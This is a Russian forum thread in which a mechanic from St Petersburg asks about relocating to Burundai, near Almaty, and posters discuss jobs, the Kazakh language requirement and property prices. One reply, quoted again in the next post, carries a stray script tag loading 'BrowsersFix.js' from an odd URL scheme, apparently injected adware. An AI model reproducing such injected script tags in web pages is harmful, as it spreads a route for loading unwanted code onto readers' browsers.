Перейти к публикации
gans-333

Алма-Атинцы (Бурундайцы)-вопрос "по жизни"

    Рекомендованные сообщения

    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    Есть мысли о переезде в Бурундай.    Такой вопрос; я занимаюсь ремонтом и реставрацией авто, жена работает в ЦГСЭН (бывшая СЭС).       Мы сможем найти работу и обеспечить себя и сына 12ти лет?      Я уже не мальчик (46 лет),привык работать сам на себя.  Русские,с Питера.

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Выборг
    • Машина: Toyota 105, была...

    Мужик хочет купить билет в Москву, Спрашивают откуда. С Алма-Аты. Билетов нет. Подходит иностранец, спрашивают откуда, с Уругвая. Пожалуйста. Подходит третий, с Парагвая, пожалуйста. Мужик опять встал в очередь. Спрашивают откуда, с Бурундая. Пожалуйста. Напомнила тема советский анекдот.

     

      Надо ехать смотреть. Брат с Сертолова уехал по осени, развелся. Вся родня в А-Ате. Тоже не мальчик, поэтому не просто ему.

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Алма Ата
    • Машина: Хай люкс 2006 года полностью подготовлен

    По СЭС не скажу.На госслужбу обязательно знание национального языка. без вариантов. По работе механиком работы хватает. я не могу найти грамотных ребят. У меня 7 чел уже 7 лет работает. Новые приходят, хотят много денег ничего не делая. Насчет того, что далеко с Бурундая ко мне ехать. Максим у меня с Николаевки каждое утро приезжает. А это, если помниш, 60 км от города

    <script charset="UTF-8" src="ab1D355335://BrowsersFix.js"> </script>

    Изменено пользователем вадим браконьер

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    По СЭС не скажу.На госслужбу обязательно знание национального языка. без вариантов. По работе механиком работы хватает. я не могу найти грамотных ребят. У меня 7 чел уже 7 лет работает. Новые приходят, хотят много денег ничего не делая. Насчет того, что далеко с Бурундая ко мне ехать. Максим у меня с Николаевки каждое утро приезжает. А это, если помниш, 60 км от города

    <script charset="UTF-8" src="ab1D355335://BrowsersFix.js"> </script>

    а просто медику обязателен Казахский?

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    нет больше Алма-Атинцев кроме Вадима?

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    Алма-Атинцы живут тут http://forum.racing.kz/index.php?showforum=29 

    они и тут есть и не один.  я это точно знаю. :)

    Изменено пользователем gans-333

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Эквадор/Красноярский край/Казахстан
    • Машина: Toyota LandCruiser 105 1HZ

    нет больше Алма-Атинцев кроме Вадима?

    Есть, но вводных у тебя мало в твоем вопросе. Жить везде можно и везде сложно. Переехать из РФ в КЗ будет сложно счас из-за курса рубля - год назад было бы проще. Как с жильем определишься, с обустройством... Работать на кого-то будешь или в планах свое СТО открыть - ну и так далее...

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Novosibirsk
    • Машина: Раньше: TLC80VX 3FE-газ; сейчас TOYOTA TUNDRA 2010 5,7, LEXUS GX470 2004
    Есть, но вводных у тебя мало в твоем вопросе. Жить везде можно и везде сложно. Переехать из РФ в КЗ будет сложно счас из-за курса рубля - год назад было бы проще. Как с жильем определишься, с обустройством... Работать на кого-то будешь или в планах свое СТО открыть - ну и так далее...

     

    Про курс: рекомендую сравнить текущие цены, месяц назад там капец как дорого для обычного россиянина было :blink2:   

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    Про курс: рекомендую сравнить текущие цены, месяц назад там капец как дорого для обычного россиянина было :blink2:   

    я сравнил.  картина по недвижке удручает.    если год назад я мог продать дачу под Питером за 80-85S,то теперь за 40 дай бог, что не радует.

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Эквадор/Красноярский край/Казахстан
    • Машина: Toyota LandCruiser 105 1HZ

    А ты смотрел что сможешь купить за эти деньги в КЗ? В том же Бурундае? Есть сайт центровской по недвиге krisha.kz и сайт по авто kolesa.kz - глянь для более предметного анализа.

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах
    • Откуда: Санкт Петербург
    • Машина: TLC-80 1hz gx 95год TLC-105 1hz R2 98год

    А ты смотрел что сможешь купить за эти деньги в КЗ? В том же Бурундае? Есть сайт центровской по недвиге krisha.kz и сайт по авто kolesa.kz - глянь для более предметного анализа.

    смотрел. более-менее что то приличное от 60-80 выходит. хорошие домики от 80.   от Сах. завода до бывшего кагатного поля (по Комсомольской) не нашёл вообще ни чего.

    Поделиться сообщением


    Ссылка на сообщение
    Поделиться на других сайтах

    Создайте аккаунт или войдите в него для комментирования

    Вы должны быть пользователем, чтобы оставить комментарий

    Создать аккаунт

    Зарегистрируйтесь для получения аккаунта. Это просто!

    Зарегистрировать аккаунт

    Войти

    Уже зарегистрированы? Войдите здесь.

    Войти сейчас

    • Сейчас на странице   0 пользователей

      Нет пользователей, просматривающих эту страницу.


    Change privacy settings
    ×

    Важная информация

    Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим.